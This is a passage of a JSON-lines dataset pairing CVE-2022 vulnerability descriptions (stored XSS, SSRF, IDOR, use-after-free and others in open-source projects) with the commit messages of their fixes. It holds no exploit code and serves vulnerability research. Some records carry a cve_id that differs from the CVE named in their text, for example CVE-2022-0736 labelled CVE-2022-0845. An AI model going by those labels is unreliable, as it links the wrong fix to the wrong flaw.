prior to 8.2.4440.'}]\n\nFix commit: patch 8.2.4440: crash with specific regexp pattern and string\n\nProblem: Crash with specific regexp pattern and string.\nSolution: Stop at the start of the string.", "cve_id": "CVE-2022-0729", "source": "cvefixes", "timestamp": ""} {"id": "77417774d3fb7b7210a6", "text": "CVE: CVE-2022-0731\n\n[{'lang': 'en', 'value': 'Improper Access Control (IDOR) in GitHub repository dolibarr/dolibarr prior to 16.0.'}]\n\nFix commit: FIX #hunterb812ea22-0c02-46fe-b89f-04519dfb1ebd", "cve_id": "CVE-2022-0731", "source": "cvefixes", "timestamp": ""} {"id": "0f8ce4868e9dd910b6a5", "text": "CVE: CVE-2022-0736\n\n[{'lang': 'en', 'value': 'Insecure Temporary File in GitHub repository mlflow/mlflow prior to 1.23.1.'}]\n\nFix commit: Use mkstemp to replace deprecated mktemp call (#5303)\n\n* Use mkstemp\r\n\r\nSigned-off-by: dbczumar \r\n\r\n* Remove num examples\r\n\r\nSigned-off-by: dbczumar \r\n\r\n* Close instead of remove\r\n\r\nSigned-off-by: dbczumar \r\n\r\n* Close the handle\r\n\r\nSigned-off-by: dbczumar ", "cve_id": "CVE-2022-0845", "source": "cvefixes", "timestamp": ""} {"id": "4582bbb1a62c2ed5509b", "text": "CVE: CVE-2022-0848\n\n[{'lang': 'en', 'value': 'OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11.'}]\n\nFix commit: Disallow uploading of potentially unsafe file extensions.", "cve_id": "CVE-2022-0848", "source": "cvefixes", "timestamp": ""} {"id": "e2a3486514ab926c3003", "text": "CVE: CVE-2022-0849\n\n[{'lang': 'en', 'value': 'Use After Free in r_reg_get_name_idx in GitHub repository radareorg/radare2 prior to 5.6.6.'}]\n\nFix commit: aaef on arm/thumb switches causes uaf ##crash\n\n* Reported by peacock-doris via huntr.dev\n* Reproducer: poc_uaf_r_reg_get", "cve_id": "CVE-2022-0849", "source": "cvefixes", "timestamp": ""} {"id": "2dd48c9ced3accb61745", "text": "CVE: CVE-2022-0855\n\n[{'lang': 'en', 'value': 'Improper Resolution of Path Equivalence in GitHub repository microweber-dev/whmcs_plugin prior to 0.0.4.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0855", "source": "cvefixes", "timestamp": ""} {"id": "82307cc845d4d6d6c991", "text": "CVE: CVE-2022-0860\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository cobbler/cobbler prior to 3.3.2.'}]\n\nFix commit: Merge pull request from GHSA-mcg6-h362-cmq5\n\nSecurity: Fix CVE-2022-0860", "cve_id": "CVE-2022-0860", "source": "cvefixes", "timestamp": ""} {"id": "f07b1a77ca2d50220210", "text": "CVE: CVE-2022-0868\n\n[{'lang': 'en', 'value': 'Open Redirect in GitHub repository medialize/uri.js prior to 1.19.10.'}]\n\nFix commit: fix(parse): handle excessive colons in scheme delimiter\n\nreported by @huydoppa via huntr.dev", "cve_id": "CVE-2022-0868", "source": "cvefixes", "timestamp": ""} {"id": "1723215810fdca81029f", "text": "CVE: CVE-2022-0869\n\n[{'lang': 'en', 'value': 'Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.'}]\n\nFix commit: fix unsafe redirect (#308)", "cve_id": "CVE-2022-0869", "source": "cvefixes", "timestamp": ""} {"id": "1dd1e321a0ef84814e9f", "text": "CVE: CVE-2022-0877\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository bookstackapp/bookstack prior to v22.02.3.'}]\n\nFix commit: Updated CSP with frame-src rules\n\n- Configurable via 'ALLOWED_IFRAME_SOURCES' .env option.\n- Also updated how CSP rules are set, with a single header being used\n instead of many.\n- Also applied CSP rules to HTML export outputs.\n- Updated tests to cover.\n\nFor #3314", "cve_id": "CVE-2022-0877", "source": "cvefixes", "timestamp": ""} {"id": "c1271947493c19316946", "text": "CVE: CVE-2022-0880\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository star7th/showdoc prior to 2.10.2.'}]\n\nFix commit: file upload bug", "cve_id": "CVE-2022-0880", "source": "cvefixes", "timestamp": ""} {"id": "ca478bbc42b122fe5874", "text": "CVE: CVE-2022-0881\n\n[{'lang': 'en', 'value': 'Insecure Storage of Sensitive Information in GitHub repository chocobozzz/peertube prior to 4.1.1.'}]\n\nFix commit: Remove exif tags when processing images", "cve_id": "CVE-2022-0881", "source": "cvefixes", "timestamp": ""} {"id": "3324d0a7667fe8730de4", "text": "CVE: CVE-2022-0890\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository mruby/mruby prior to 3.2.'}]\n\nFix commit: fiber.c: should pack 15+ arguments in an array.", "cve_id": "CVE-2022-0890", "source": "cvefixes", "timestamp": ""} {"id": "ac11775c779e0834abb9", "text": "CVE: CVE-2022-0893\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.'}]\n\nFix commit: [Admin] Security - Add handler to enable Content Security Policy (#11447)\n\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - fix document preview\r\n\r\n* [Admin] Security - Add handler to enab", "cve_id": "CVE-2022-0893", "source": "cvefixes", "timestamp": ""} {"id": "cc35df02f794d3ed8da0", "text": "CVE: CVE-2022-0894\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.'}]\n\nFix commit: [Admin] Security - Add handler to enable Content Security Policy (#11447)\n\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - fix document preview\r\n\r\n* [Admin] Security - Add handler to enab", "cve_id": "CVE-2022-0894", "source": "cvefixes", "timestamp": ""} {"id": "187f7af0fa34f51c3d90", "text": "CVE: CVE-2022-0895\n\n[{'lang': 'en', 'value': 'Static Code Injection in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update ContactInformationTrait.php", "cve_id": "CVE-2022-0895", "source": "cvefixes", "timestamp": ""} {"id": "868de3d5c6c221e2e2d8", "text": "CVE: CVE-2022-0896\n\n[{'lang': 'en', 'value': 'Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update AdminCommentController.php", "cve_id": "CVE-2022-0896", "source": "cvefixes", "timestamp": ""} {"id": "98ba7b2ff2ae714c3ca6", "text": "CVE: CVE-2022-0905\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository go-gitea/gitea prior to 1.16.4.'}]\n\nFix commit: fix pam authorization (#19040)\n\nhttps://huntr.dev/bounties/8d221f92-b2b1-4878-bc31-66ff272e5ceb/\r\n\r\nCo-authored-by: ysf <34326+ysf@users.noreply.github.com>", "cve_id": "CVE-2022-0905", "source": "cvefixes", "timestamp": ""} {"id": "b377c6f706e35cab5caa", "text": "CVE: CVE-2022-0906\n\n[{'lang': 'en', 'value': 'Unrestricted file upload leads to stored XSS in GitHub repository microweber/microweber prior to 1.1.12.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0906", "source": "cvefixes", "timestamp": ""} {"id": "5b3afebe7cc0fd981320", "text": "CVE: CVE-2022-0911\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.'}]\n\nFix commit: [Admin] Security - Add handler to enable Content Security Policy (#11447)\n\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - fix document preview\r\n\r\n* [Admin] Security - Add handler to enab", "cve_id": "CVE-2022-0911", "source": "cvefixes", "timestamp": ""} {"id": "577a6c36ca63175c3e4d", "text": "CVE: CVE-2022-0912\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository microweber/microweber prior to 1.2.11.'}]\n\nFix commit: update", "cve_id": "CVE-2022-0912", "source": "cvefixes", "timestamp": ""} {"id": "5d2ca3544c1156cb75f4", "text": "CVE: CVE-2022-0913\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: checkout shipping address validation - max chars allowed", "cve_id": "CVE-2022-0913", "source": "cvefixes", "timestamp": ""} {"id": "2af1e5f4b9e427ba225f", "text": "CVE: CVE-2022-0921\n\n[{'lang': 'en', 'value': 'Abusing Backup/Restore feature to achieve Remote Code Execution in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: secure upgrade on php files upload", "cve_id": "CVE-2022-0921", "source": "cvefixes", "timestamp": ""} {"id": "7290a07b8b909165b300", "text": "CVE: CVE-2022-0926\n\n[{'lang': 'en', 'value': 'File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: Update Files.php", "cve_id": "CVE-2022-0926", "source": "cvefixes", "timestamp": ""} {"id": "0d03368c77c93731785d", "text": "CVE: CVE-2022-0928\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: upgrade taxes to laravel routers", "cve_id": "CVE-2022-0928", "source": "cvefixes", "timestamp": ""} {"id": "848dc2be9251b7f8acf9", "text": "CVE: CVE-2022-0929\n\n[{'lang': 'en', 'value': 'XSS on dynamic_text module in GitHub repository microweber/microweber prior to 1.2.11.'}]\n\nFix commit: Update build-and-upload.yml", "cve_id": "CVE-2022-0929", "source": "cvefixes", "timestamp": ""} {"id": "d572d3076b7743eb1475", "text": "CVE: CVE-2022-0930\n\n[{'lang': 'en', 'value': 'File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: make plupload only allowed files", "cve_id": "CVE-2022-0930", "source": "cvefixes", "timestamp": ""} {"id": "bc96a276c40937a8a4dd", "text": "CVE: CVE-2022-0932\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository saleor/saleor prior to 3.1.2.'}]\n\nFix commit: Require manage orders for fetching `user.orders` (#9128)\n\n* Require manage orders for fetching customer.orders\r\n\r\n* Update changelog\r\n\r\nCo-authored-by: Marcin Gębala <5421321+maarcingebala@users.noreply.github.com>", "cve_id": "CVE-2022-0932", "source": "cvefixes", "timestamp": ""} {"id": "30ed7cbac685e0871f10", "text": "CVE: CVE-2022-0935\n\n[{'lang': 'en', 'value': 'Host Header injection in password Reset in GitHub repository livehelperchat/livehelperchat prior to 3.97.'}]\n\nFix commit: Migrate to static HTTP_HOST (#1754)\n\nStatic HTTP_HOST option and security section in update page.", "cve_id": "CVE-2022-0935", "source": "cvefixes", "timestamp": ""} {"id": "3033d50ed599119a5b48", "text": "CVE: CVE-2022-0936\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository autolab/autolab prior to 2.8.0.'}]\n\nFix commit: Force download of attachments (#1490)\n\n* Rubocop fix\r\n\r\n* resolve merge\r\n\r\n* restore gemfile\r\n\r\n* restore nl", "cve_id": "CVE-2022-0936", "source": "cvefixes", "timestamp": ""} {"id": "a7de5450be6aabec6249", "text": "CVE: CVE-2022-0937\n\n[{'lang': 'en', 'value': 'Stored xss in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: file upload bug", "cve_id": "CVE-2022-0937", "source": "cvefixes", "timestamp": ""} {"id": "95efcbc1cac2f1e5985a", "text": "CVE: CVE-2022-0938\n\n[{'lang': 'en', 'value': 'Stored XSS via file upload in GitHub repository star7th/showdoc prior to v2.10.4.'}]\n\nFix commit: Merge pull request #1628 from ajaysenr/master\n\nUpdate AttachmentModel.class.php", "cve_id": "CVE-2022-0938", "source": "cvefixes", "timestamp": ""} {"id": "a2928745a067eaf6f3c0", "text": "CVE: CVE-2022-0939\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.'}]\n\nFix commit: Better epub cover parsing with multiple cover-image items\nCode cosmetics\nrenamed variables\nrefactored xml page generation\nrefactored prepare author", "cve_id": "CVE-2022-0939", "source": "cvefixes", "timestamp": ""} {"id": "a4f81ac5278795cf8464", "text": "CVE: CVE-2022-0940\n\n[{'lang': 'en', 'value': 'Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4.'}]\n\nFix commit: Merge pull request #1629 from ajaysenr/master\n\nUpdate AttachmentModel.class.php", "cve_id": "CVE-2022-0940", "source": "cvefixes", "timestamp": ""} {"id": "44a55feda0739a49821e", "text": "CVE: CVE-2022-0941\n\n[{'lang': 'en', 'value': 'Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4.'}]\n\nFix commit: Merge pull request #1630 from ajaysenr/master\n\nUpdate AttachmentModel.class.php", "cve_id": "CVE-2022-0941", "source": "cvefixes", "timestamp": ""} {"id": "53665ca09c9990fa22ec", "text": "CVE: CVE-2022-0942\n\n[{'lang': 'en', 'value': 'Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Upload file vulnerability", "cve_id": "CVE-2022-0942", "source": "cvefixes", "timestamp": ""} {"id": "b26f9326ae87a5c94ba9", "text": "CVE: CVE-2022-0943\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow occurs in vim in GitHub repository vim/vim prior to 8.2.4563.'}]\n\nFix commit: patch 8.2.4563: \"z=\" in Visual mode may go beyond the end of the line\n\nProblem: \"z=\" in Visual mode may go beyond the end of the line.\nSolution: Adjust \"badlen\".", "cve_id": "CVE-2022-0943", "source": "cvefixes", "timestamp": ""} {"id": "5773d5c7b07071ce3b25", "text": "CVE: CVE-2022-0944\n\n[{'lang': 'en', 'value': 'Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.'}]\n\nFix commit: Use mustache to process connection template (#1110)", "cve_id": "CVE-2022-0944", "source": "cvefixes", "timestamp": ""} {"id": "b2b542213ec1404db3dd", "text": "CVE: CVE-2022-0945\n\n[{'lang': 'en', 'value': 'Stored XSS viva axd and cshtml file upload in star7th/showdoc in GitHub repository star7th/showdoc prior to v2.10.4.'}]\n\nFix commit: bug", "cve_id": "CVE-2022-0945", "source": "cvefixes", "timestamp": ""} {"id": "20b63cf01036f346d16d", "text": "CVE: CVE-2022-0946\n\n[{'lang': 'en', 'value': 'Stored XSS viva cshtm file upload in GitHub repository star7th/showdoc prior to v2.10.4.'}]\n\nFix commit: bug", "cve_id": "CVE-2022-0946", "source": "cvefixes", "timestamp": ""} {"id": "446a249631c6966d923f", "text": "CVE: CVE-2022-0950\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: file upload bug", "cve_id": "CVE-2022-0950", "source": "cvefixes", "timestamp": ""} {"id": "5b7b2d125a17d4cc2b23", "text": "CVE: CVE-2022-0951\n\n[{'lang': 'en', 'value': 'File Upload Restriction Bypass leading to Stored XSS Vulnerability in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: file upload bug", "cve_id": "CVE-2022-0951", "source": "cvefixes", "timestamp": ""} {"id": "d362e488332fd05058d8", "text": "CVE: CVE-2022-0954\n\n[{'lang': 'en', 'value': \"Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.\"}]\n\nFix commit: Update SaveOptionApiController.php", "cve_id": "CVE-2022-0954", "source": "cvefixes", "timestamp": ""} {"id": "8e626e05169e331764e1", "text": "CVE: CVE-2022-0955\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/data-hub prior to 1.2.4.'}]\n\nFix commit: follow up to https://github.com/pimcore/data-hub/pull/462", "cve_id": "CVE-2022-0955", "source": "cvefixes", "timestamp": ""} {"id": "4d072d2085b789d8ac4c", "text": "CVE: CVE-2022-0956\n\n[{'lang': 'en', 'value': 'Stored XSS via File Upload in GitHub repository star7th/showdoc prior to v.2.10.4.'}]\n\nFix commit: file upload bug", "cve_id": "CVE-2022-0956", "source": "cvefixes", "timestamp": ""} {"id": "06ff941395ebbfc545bc", "text": "CVE: CVE-2022-0957\n\n[{'lang': 'en', 'value': 'Stored XSS via File Upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Merge pull request #1632 from ajaysenr/master\n\nUpdate AttachmentModel.class.php", "cve_id": "CVE-2022-0957", "source": "cvefixes", "timestamp": ""} {"id": "fd87fbb553bdc15cb260", "text": "CVE: CVE-2022-0960\n\n[{'lang': 'en', 'value': 'Stored XSS viva .properties file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: file upload bug", "cve_id": "CVE-2022-0960", "source": "cvefixes", "timestamp": ""} {"id": "def2c74a4626d9075702", "text": "CVE: CVE-2022-0961\n\n[{'lang': 'en', 'value': 'The microweber application allows large characters to insert in the input field \"post title\" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: Update PostRequest.php", "cve_id": "CVE-2022-0961", "source": "cvefixes", "timestamp": ""} {"id": "f61e5a5229e76953370b", "text": "CVE: CVE-2022-0962\n\n[{'lang': 'en', 'value': 'Stored XSS viva .webma file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Upload file vulnerability", "cve_id": "CVE-2022-0962", "source": "cvefixes", "timestamp": ""} {"id": "cac762e9c3b03a570f08", "text": "CVE: CVE-2022-0963\n\n[{'lang': 'en', 'value': 'Unrestricted XML Files Leads to Stored XSS in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: Update Files.php", "cve_id": "CVE-2022-0963", "source": "cvefixes", "timestamp": ""} {"id": "2150761cef7cb011805d", "text": "CVE: CVE-2022-0964\n\n[{'lang': 'en', 'value': 'Stored XSS viva .webmv file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Upload file vulnerability", "cve_id": "CVE-2022-0964", "source": "cvefixes", "timestamp": ""} {"id": "2d642adad68cfacfa671", "text": "CVE: CVE-2022-0965\n\n[{'lang': 'en', 'value': 'Stored XSS viva .ofd file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Upload file vulnerability", "cve_id": "CVE-2022-0965", "source": "cvefixes", "timestamp": ""} {"id": "5b9ee070a9dbb855fa8c", "text": "CVE: CVE-2022-0966\n\n[{'lang': 'en', 'value': 'Stored XSS via File Upload in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.4.10.'}]\n\nFix commit: Upload file vulnerability", "cve_id": "CVE-2022-0966", "source": "cvefixes", "timestamp": ""} {"id": "d65980a256b455411625", "text": "CVE: CVE-2022-0967\n\n[{'lang': 'en', 'value': 'Stored XSS via File Upload in star7th/showdoc in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Upload file vulnerability", "cve_id": "CVE-2022-0967", "source": "cvefixes", "timestamp": ""} {"id": "0e436f64b82fd4f61929", "text": "CVE: CVE-2022-0968\n\n[{'lang': 'en', 'value': 'The microweber application allows large characters to insert in the input field \"fist & last name\" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in microweber/microweber in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: user update requrest validation", "cve_id": "CVE-2022-0968", "source": "cvefixes", "timestamp": ""} {"id": "72f2f341129c43966659", "text": "CVE: CVE-2022-0970\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository getgrav/grav prior to 1.7.31.'}]\n\nFix commit: Added XSS check for uploaded SVG files before they get stored", "cve_id": "CVE-2022-0970", "source": "cvefixes", "timestamp": ""} {"id": "18a2647be93d7686ba28", "text": "CVE: CVE-2022-0986\n\n[{'lang': 'en', 'value': 'Reflected Cross-site Scripting (XSS) Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.11.'}]\n\nFix commit: Patch out XSS in edit server (#2471)", "cve_id": "CVE-2022-0986", "source": "cvefixes", "timestamp": ""} {"id": "d18393d9663fa391b0f1", "text": "CVE: CVE-2022-0990\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.'}]\n\nFix commit: Better epub cover parsing with multiple cover-image items\nCode cosmetics\nrenamed variables\nrefactored xml page generation\nrefactored prepare author", "cve_id": "CVE-2022-0990", "source": "cvefixes", "timestamp": ""} {"id": "a3876ae2a2c41097d383", "text": "CVE: CVE-2022-0991\n\n[{'lang': 'en', 'value': 'Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9.'}]\n\nFix commit: Sessions should be invalidated if password was changed #1238", "cve_id": "CVE-2022-0991", "source": "cvefixes", "timestamp": ""} {"id": "9aca647251d6b8f83fbf", "text": "CVE: CVE-2022-1000\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7.'}]\n\nFix commit: apply fix to path traversal vulnerability (#718)\n\nCo-authored-by: João Maurício ", "cve_id": "CVE-2022-1000", "source": "cvefixes", "timestamp": ""} {"id": "b9365b3a895546d43a15", "text": "CVE: CVE-2022-1021\n\n[{'lang': 'en', 'value': 'Insecure Storage of Sensitive Information in GitHub repository chatwoot/chatwoot prior to 2.6.0.'}]\n\nFix commit: fix: Referer URL validation (#4309)\n\nFixes #354", "cve_id": "CVE-2022-1021", "source": "cvefixes", "timestamp": ""} {"id": "68ac59b96c6b793520e4", "text": "CVE: CVE-2022-1022\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository chatwoot/chatwoot prior to 2.5.0.'}]\n\nFix commit: chore: Sanitize html content (#4498)", "cve_id": "CVE-2022-1022", "source": "cvefixes", "timestamp": ""} {"id": "5ffa6d99216678577448", "text": "CVE: CVE-2022-1031\n\n[{'lang': 'en', 'value': 'Use After Free in op_is_set_bp in GitHub repository radareorg/radare2 prior to 5.6.6.'}]\n\nFix commit: Fix UAF in aaaa on arm/thumb switching ##crash\n\n* Reported by @peacock-doris via huntr.dev\n* Reproducer tests_65185\n* This is a logic fix, but not the fully safe as changes in the code\n can result on UAF again, to properly protect r2 from crashing we\n need to break the ABI and add refcounting to RRegItem, which can't\n happen in 5.6.x because of ab", "cve_id": "CVE-2022-1031", "source": "cvefixes", "timestamp": ""} {"id": "8e0423e9e24476931dc1", "text": "CVE: CVE-2022-1032\n\n[{'lang': 'en', 'value': 'Insecure deserialization of not validated module file in GitHub repository crater-invoice/crater prior to 6.0.6.'}]\n\nFix commit: Module upload validation (#857)\n\nhttps://huntr.dev/bounties/cb9a0393-be34-4021-a06c-00c7791c7622/", "cve_id": "CVE-2022-1032", "source": "cvefixes", "timestamp": ""} {"id": "68bc553fe3cef9a170bf", "text": "CVE: CVE-2022-1033\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository crater-invoice/crater prior to 6.0.6.'}]\n\nFix commit: Expense attachment validation fix (#855)\n\nhttps://huntr.dev/bounties/4d7d4fc9-e0cf-42d3-b89c-6ea57a769045/", "cve_id": "CVE-2022-1033", "source": "cvefixes", "timestamp": ""} {"id": "60abab30b70062e93ef9", "text": "CVE: CVE-2022-1034\n\n[{'lang': 'en', 'value': 'There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3 in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: Security update / 安全性更新", "cve_id": "CVE-2022-1034", "source": "cvefixes", "timestamp": ""} {"id": "32e09159031c558e5bbf", "text": "CVE: CVE-2022-1035\n\n[{'lang': 'en', 'value': 'Segmentation Fault caused by MP4Box -lsr in GitHub repository gpac/gpac prior to 2.1.0-DEV.'}]\n\nFix commit: fixed #2146", "cve_id": "CVE-2022-1035", "source": "cvefixes", "timestamp": ""} {"id": "68534aad12663188eb17", "text": "CVE: CVE-2022-1036\n\n[{'lang': 'en', 'value': 'Able to create an account with long password leads to memory corruption / Integer Overflow in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: max 500 chars on password", "cve_id": "CVE-2022-1036", "source": "cvefixes", "timestamp": ""} {"id": "7c1bcc183ce6c22402b3", "text": "CVE: CVE-2022-1044\n\n[{'lang': 'en', 'value': 'Sensitive Data Exposure Due To Insecure Storage Of Profile Image in GitHub repository polonel/trudesk prior to v1.2.1.'}]\n\nFix commit: fix(uploads): removal of EXIF data on profile picture uploads", "cve_id": "CVE-2022-1044", "source": "cvefixes", "timestamp": ""} {"id": "506f9e42897d1b874103", "text": "CVE: CVE-2022-1045\n\n[{'lang': 'en', 'value': 'Stored XSS viva .svg file upload in GitHub repository polonel/trudesk prior to v1.2.0.'}]\n\nFix commit: fix(tickets): disable uploading .svg as an attachment", "cve_id": "CVE-2022-1045", "source": "cvefixes", "timestamp": ""} {"id": "64ac7f2d164ba4f190ae", "text": "CVE: CVE-2022-1052\n\n[{'lang': 'en', 'value': 'Heap Buffer Overflow in iterate_chained_fixups in GitHub repository radareorg/radare2 prior to 5.6.6.'}]\n\nFix commit: Fix heap OOB read in macho.iterate_chained_fixups ##crash\n\n* Reported by peacock-doris via huntr.dev\r\n* Reproducer 'tests_65305'\r\n\r\nmrmacete:\r\n* Return early if segs_count is 0\r\n* Initialize segs_count also for reconstructed fixups\r\n\r\nCo-authored-by: pancake \r\nCo-authored-by: Francesco Tamagni ", "cve_id": "CVE-2022-1155", "source": "cvefixes", "timestamp": ""} {"id": "2dc66368db6085fbfc85", "text": "CVE: CVE-2022-1160\n\n[{'lang': 'en', 'value': 'heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647.'}]\n\nFix commit: patch 8.2.4647: \"source\" can read past end of copied line\n\nProblem: \"source\" can read past end of copied line.\nSolution: Add a terminating NUL.", "cve_id": "CVE-2022-1160", "source": "cvefixes", "timestamp": ""} {"id": "87c111a59f588d33f139", "text": "CVE: CVE-2022-1163\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository mineweb/minewebcms prior to next.'}]\n\nFix commit: improv. fix xss with navbar", "cve_id": "CVE-2022-1163", "source": "cvefixes", "timestamp": ""} {"id": "ee08f92d3b35626483fa", "text": "CVE: CVE-2022-1172\n\n[{'lang': 'en', 'value': 'Null Pointer Dereference Caused Segmentation Fault in GitHub repository gpac/gpac prior to 2.1.0-DEV.'}]\n\nFix commit: fixed #2153", "cve_id": "CVE-2022-1172", "source": "cvefixes", "timestamp": ""} {"id": "7e4d769c2b09e146af22", "text": "CVE: CVE-2022-1173\n\n[{'lang': 'en', 'value': 'stored xss in GitHub repository getgrav/grav prior to 1.7.33.'}]\n\nFix commit: Fixed XSS check not detecting onX events without quotes", "cve_id": "CVE-2022-1173", "source": "cvefixes", "timestamp": ""} {"id": "3955c5724ddeb7d95537", "text": "CVE: CVE-2022-1176\n\n[{'lang': 'en', 'value': 'Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96.'}]\n\nFix commit: Type check", "cve_id": "CVE-2022-1176", "source": "cvefixes", "timestamp": ""} {"id": "ad1fb37df683fb9931be", "text": "CVE: CVE-2022-1177\n\n[{'lang': 'en', 'value': 'Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0.'}]\n\nFix commit: limit access to reports for front and back office (#4893)\n\n* add acl report check to custom report\r\n\r\n* remove report and notes access for accountants and front office on install\r\n\r\n* revert change to administrators\r\n\r\n* adjust install and upgrade\r\n\r\n* reorder case in shiftAcl\r\n\r\n* add alter acls to template\r\n\r\n* review fixes, ", "cve_id": "CVE-2022-1177", "source": "cvefixes", "timestamp": ""} {"id": "097c2ae832aaf1e89229", "text": "CVE: CVE-2022-1191\n\n[{'lang': 'en', 'value': 'SSRF on index.php/cobrowse/proxycss/ in GitHub repository livehelperchat/livehelperchat prior to 3.96.'}]\n\nFix commit: Harden to avoid SSRF", "cve_id": "CVE-2022-1191", "source": "cvefixes", "timestamp": ""} {"id": "131688dc3a22ca3ef575", "text": "CVE: CVE-2022-1201\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in mrb_vm_exec with super in GitHub repository mruby/mruby prior to 3.2. This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.'}]\n\nFix commit: vm.c: target class may be NULL.", "cve_id": "CVE-2022-1201", "source": "cvefixes", "timestamp": ""} {"id": "130e5441721333b63268", "text": "CVE: CVE-2022-1207\n\n[{'lang': 'en', 'value': 'Out-of-bounds read in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability allows attackers to read sensitive information from outside the allocated buffer boundary.'}]\n\nFix commit: Fix 1 byte oobread in the cris analysis plugin ##crash", "cve_id": "CVE-2022-1207", "source": "cvefixes", "timestamp": ""} {"id": "6a5ab9ea45e6ce9192ac", "text": "CVE: CVE-2022-1212\n\n[{'lang': 'en', 'value': 'Use-After-Free in str_escape in mruby/mruby in GitHub repository mruby/mruby prior to 3.2. Possible arbitrary code execution if being exploited.'}]\n\nFix commit: vm.c: create break object before clearing GC arena.\n\nOtherwise it possibly cause use-after-free.", "cve_id": "CVE-2022-1212", "source": "cvefixes", "timestamp": ""} {"id": "4202bb1c20507ba42cc9", "text": "CVE: CVE-2022-1213\n\n[{'lang': 'en', 'value': 'SSRF filter bypass port 80, 433 in GitHub repository livehelperchat/livehelperchat prior to 3.67v. An 